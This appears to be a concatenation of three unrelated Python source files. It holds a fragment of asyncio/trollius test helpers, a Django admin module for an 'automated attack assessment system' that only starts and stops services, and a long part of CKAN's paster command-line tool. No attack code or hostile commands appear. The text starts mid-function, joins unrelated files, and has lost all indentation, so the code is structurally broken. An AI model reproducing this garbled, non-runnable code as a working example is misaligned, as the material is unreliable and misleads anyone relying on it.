with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(use_ssl=False):
with unix_socket_path() as path:
for item in _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer):
yield item
@contextlib.contextmanager
def run_test_server(host='127.0.0.1', port=0, use_ssl=False):
for item in _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer):
yield item
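# Illustrative sketch (assumed, not part of the original test helpers): fetch
# the fixed body served by the WSGI app defined in _run_test_server() above.
# The helper name and the use of urlopen are purely for demonstration.
def _example_fetch_from_test_server():
    try:
        from urllib.request import urlopen   # Python 3
    except ImportError:
        from urllib2 import urlopen          # Python 2
    with run_test_server() as httpd:
        host, port = httpd.address
        return urlopen('http://%s:%s/' % (host, port)).read()   # b'Test message'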
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super(TestLoop, self).__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super(TestLoop, self).close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self)
def remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
assert fd in self.readers, 'fd {0} is not registered'.format(fd)
handle = self.readers[fd]
assert handle._callback == callback, '{0!r} != {1!r}'.format(
handle._callback, callback)
assert handle._args == args, '{0!r} != {1!r}'.format(
handle._args, args)
def add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self)
def remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {0} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{0!r} != {1!r}'.format(
handle._callback, callback)
assert handle._args == args, '{0!r} != {1!r}'.format(
handle._args, args)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super(TestLoop, self)._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args):
self._timers.append(when)
return super(TestLoop, self).call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
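# A minimal sketch (hypothetical values, not from the original file) of a time
# generator with the shape described in the TestLoop docstring above, for a
# test that schedules exactly two timed callbacks.
def _example_time_gen():
    when = yield          # absolute time of the first scheduled callback
    when = yield when     # advance straight to it; receive the next deadline
    yield 0.1             # final (hypothetical) advance; the generator then
                          # ends, so TestLoop.close() sees StopIteration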
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
def get_function_source(func):
source = events._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
def set_event_loop(self, loop, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(loop.close)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def tearDown(self):
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
if sys.exc_info()[0] == SkipTest:
if compat.PY2:
sys.exc_clear()
else:
self.assertEqual(sys.exc_info(), (None, None, None))
if not hasattr(unittest.TestCase, 'assertRaisesRegex'):
def assertRaisesRegex(self, expected_exception, expected_regex,
callable_obj=None, *args, **kwargs):
"""Asserts that the message in a raised exception matches a regex.
Args:
expected_exception: Exception class expected to be raised.
expected_regex: Regex (re pattern object or string) expected
to be found in error message.
callable_obj: Function to be called.
msg: Optional message used in case of failure. Can only be used
when assertRaisesRegex is used as a context manager.
args: Extra args.
kwargs: Extra kwargs.
"""
context = _AssertRaisesContext(expected_exception, self, callable_obj,
expected_regex)
return context.handle('assertRaisesRegex', callable_obj, args, kwargs)
if not hasattr(unittest.TestCase, 'assertRegex'):
def assertRegex(self, text, expected_regex, msg=None):
"""Fail the test unless the text matches the regular expression."""
if isinstance(expected_regex, (str, bytes)):
assert expected_regex, "expected_regex must not be empty."
expected_regex = re.compile(expected_regex)
if not expected_regex.search(text):
msg = msg or "Regex didn't match"
msg = '%s: %r not found in %r' % (msg, expected_regex.pattern, text)
raise self.failureException(msg)
def check_soure_traceback(self, source_traceback, lineno_delta):
frame = sys._getframe(1)
filename = frame.f_code.co_filename
lineno = frame.f_lineno + lineno_delta
name = frame.f_code.co_name
self.assertIsInstance(source_traceback, list)
self.assertEqual(source_traceback[-1][:3],
(filename,
lineno,
name))
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket():
"""Create a mock of a non-blocking socket."""
sock = mock.Mock(socket.socket)
sock.gettimeout.return_value = 0.0
return sock
def force_legacy_ssl_support():
return mock.patch('trollius.sslproto._is_sslproto_available',
return_value=False)
admin.py
import threading
from django.db import transaction
from django.contrib import admin, messages
from Configuration.views import service_start, service_stop
from Configuration.models import Configuration, Services, ServicesLog
# Register your models here.
admin.site.site_header = '阿波罗自动化攻击评估系统'  # set the admin site header ("Apollo automated attack assessment system")
admin.site.site_title = '阿波罗自动化攻击评估系统'  # set the admin site title
@admin.register(Configuration)
class ConfigAdmin(admin.ModelAdmin):
list_display = ['name', 'user', 'value', 'count', 'port', 'ipaddress', 'domain', 'change']
list_filter = ['name', ]
search_fields = ['name', 'user']
ordering = ["id"]
@admin.register(Services)
class ServicesAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'ip_address', 'port', 'state', 'change']
search_fields = ['name']
ordering = ["id"]
@transaction.atomic
def start(self, request, queryset):
work_ids = None
for item in request.POST.lists():
if item[0] == "_selected_action":
work_ids = item[1]
if isinstance(work_ids, list):
for work_id in work_ids:
thread = threading.Thread(target=service_start, args=(work_id,))
thread.start()
messages.add_message(request, messages.SUCCESS, '启动服务%s' % str(work_id))
else:
            messages.add_message(request, messages.ERROR, '启动服务异常')
start.short_description = "启动服务"
start.icon = 'fa fa-rocket'
start.style = 'color:white;'
start.type = 'danger'
start.confirm = '您确定要启动服务吗?'
@transaction.atomic
def stop(self, request, queryset):
work_ids = None
for item in request.POST.lists():
if item[0] == "_selected_action":
work_ids = item[1]
if isinstance(work_ids, list):
for work_id in work_ids:
thread = threading.Thread(target=service_stop, args=(work_id,))
thread.start()
messages.add_message(request, messages.SUCCESS, '停止服务%s' % str(work_id))
else:
            messages.add_message(request, messages.ERROR, '停止服务异常')
stop.short_description = "停止服务"
stop.icon = 'fa fa-rocket'
stop.style = 'color:white;'
stop.type = 'danger'
stop.confirm = '您确定要停止服务吗?'
actions = [start, stop, ]
@admin.register(ServicesLog)
class ServicesLogAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'ip_address', 'method', 'status', 'message', 'timestamp']
list_filter = ['name', 'method', 'status', ]
search_fields = ['ip_address', 'message']
ordering = ["id"]
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
return False
cli.py
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import ckan.plugins as p
import sqlalchemy as sa
import urlparse
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from pylons import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
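# Illustrative sketch only: for the example url in the docstring above,
# 'postgres://tester:pass@localhost/ckantest3', parse_db_config() returns the
# dict below (db_port is empty because the url carries no port).
def _example_parsed_db_config():
    return {'db_type': 'postgres',
            'db_user': 'tester',
            'db_pass': 'pass',
            'db_host': 'localhost',
            'db_port': '',
            'db_name': 'ckantest3'}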
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes":"yes", "y":"yes", "ye":"yes",
"no":"no", "n":"no"}
if default == None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if self.options.config:
self.filename = os.path.abspath(self.options.config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
self.filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
self.filename = os.path.join(os.getcwd(), 'development.ini')
config_source = 'default value'
if not os.path.exists(self.filename):
msg = 'Config file not found: %s' % self.filename
msg += '\n(Given by: %s)' % config_source
raise self.BadCommand(msg)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self, load_site_user=True):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry=Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
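# Illustrative sketch (hypothetical command, not part of CKAN): a minimal
# paster command following the pattern above -- call _load_config() first and
# only import ckan modules afterwards, as the NB comment at the top of this
# file requires.
class _ExampleCountDatasets(CkanCommand):
    '''Print how many datasets are in the database (illustration only).'''
    summary = __doc__.split('\n')[0]
    usage = __doc__
    max_args = 0
    min_args = 0
    def command(self):
        self._load_config()
        import ckan.model as model      # safe: the config is loaded by now
        print 'datasets: %i' % model.Session.query(model.Package).count()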
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file
db dump-rdf DATASET_NAME FILE_PATH
db simple-dump-csv FILE_PATH - dump just datasets in CSV format
db simple-dump-json FILE_PATH - dump just datasets in JSON format
db user-dump-csv FILE_PATH - dump user information to a CSV file
db send-rdf TALIS_STORE USERNAME PASSWORD
db load FILE_PATH - load a pg_dump from a file
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing
db create-from-model - create database from the model (indexes not made)
    db migrate-filestore - migrate all uploaded data from the 2.1 filestore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'simple-dump-csv':
self.simple_dump_csv()
elif cmd == 'simple-dump-json':
self.simple_dump_json()
elif cmd == 'dump-rdf':
self.dump_rdf()
elif cmd == 'user-dump-csv':
self.user_dump_csv()
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'send-rdf':
self.send_rdf()
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def simple_dump_csv(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='csv')
def simple_dump_json(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need json file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='json')
def dump_rdf(self):
if len(self.args) < 3:
print 'Need dataset name and rdf file path'
return
package_name = self.args[1]
rdf_path = self.args[2]
import ckan.model as model
import ckan.lib.rdf as rdf
pkg = model.Package.by_name(unicode(package_name))
if not pkg:
print 'Dataset name "%s" does not exist' % package_name
return
rdf = rdf.RdfExporter().export_package(pkg)
f = open(rdf_path, 'w')
f.write(rdf)
f.close()
def user_dump_csv(self):
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.UserDumper().dump(dump_file)
def send_rdf(self):
if len(self.args) < 4:
print 'Need all arguments: {talis-store} {username} {password}'
return
talis_store = self.args[1]
username = self.args[2]
password = self.args[3]
import ckan.lib.talis
talis = ckan.lib.talis.Talis()
return talis.send_rdf(talis_store, username, password)
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = '%s'" % id)
Session.execute("update resource_revision set url_type = 'upload'"
"where id = '%s' and "
"revision_id = '%s'" % (id, revision_id))
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
    search-index rebuild_fast                       - reindex using multiprocessing across all cores.
                                                      This acts in the same way as rebuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self,name):
super(SearchIndexCommand,self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False, help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False, help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False, help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
                               immediately visible in search results, but significantly slows down the process.
Default is false.'''
)
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
        # By default we don't commit after each request to Solr, as it is
        # a really heavy operation that slows things down a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each))
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear
package_id =self.args[1] if len(self.args) > 1 else None
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
            ## load the actual environment for each subprocess, so each has
            ## its own sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets( self.args[0] )
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
import pylons.config as config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir( out_folder ):
os.makedirs( out_folder )
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id':dataset_name })
if not dd['state'] == 'active':
continue
url = h.url_for( controller='package',action='read',
id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join( out_folder, dd['name'] ) + ".rdf"
r = urllib2.urlopen(url).read()
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write( str(ioe) + "\n" )
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd == None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True)
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state = 'active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
print 'Passwords do not match'
sys.exit(1)
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
sys.exit(1)
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
                raise ValueError('Could not parse arg: %r (expected "<option>=<value>")' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
print e
sys.exit(1)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.delete()
model.repo.commit_and_remove()
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
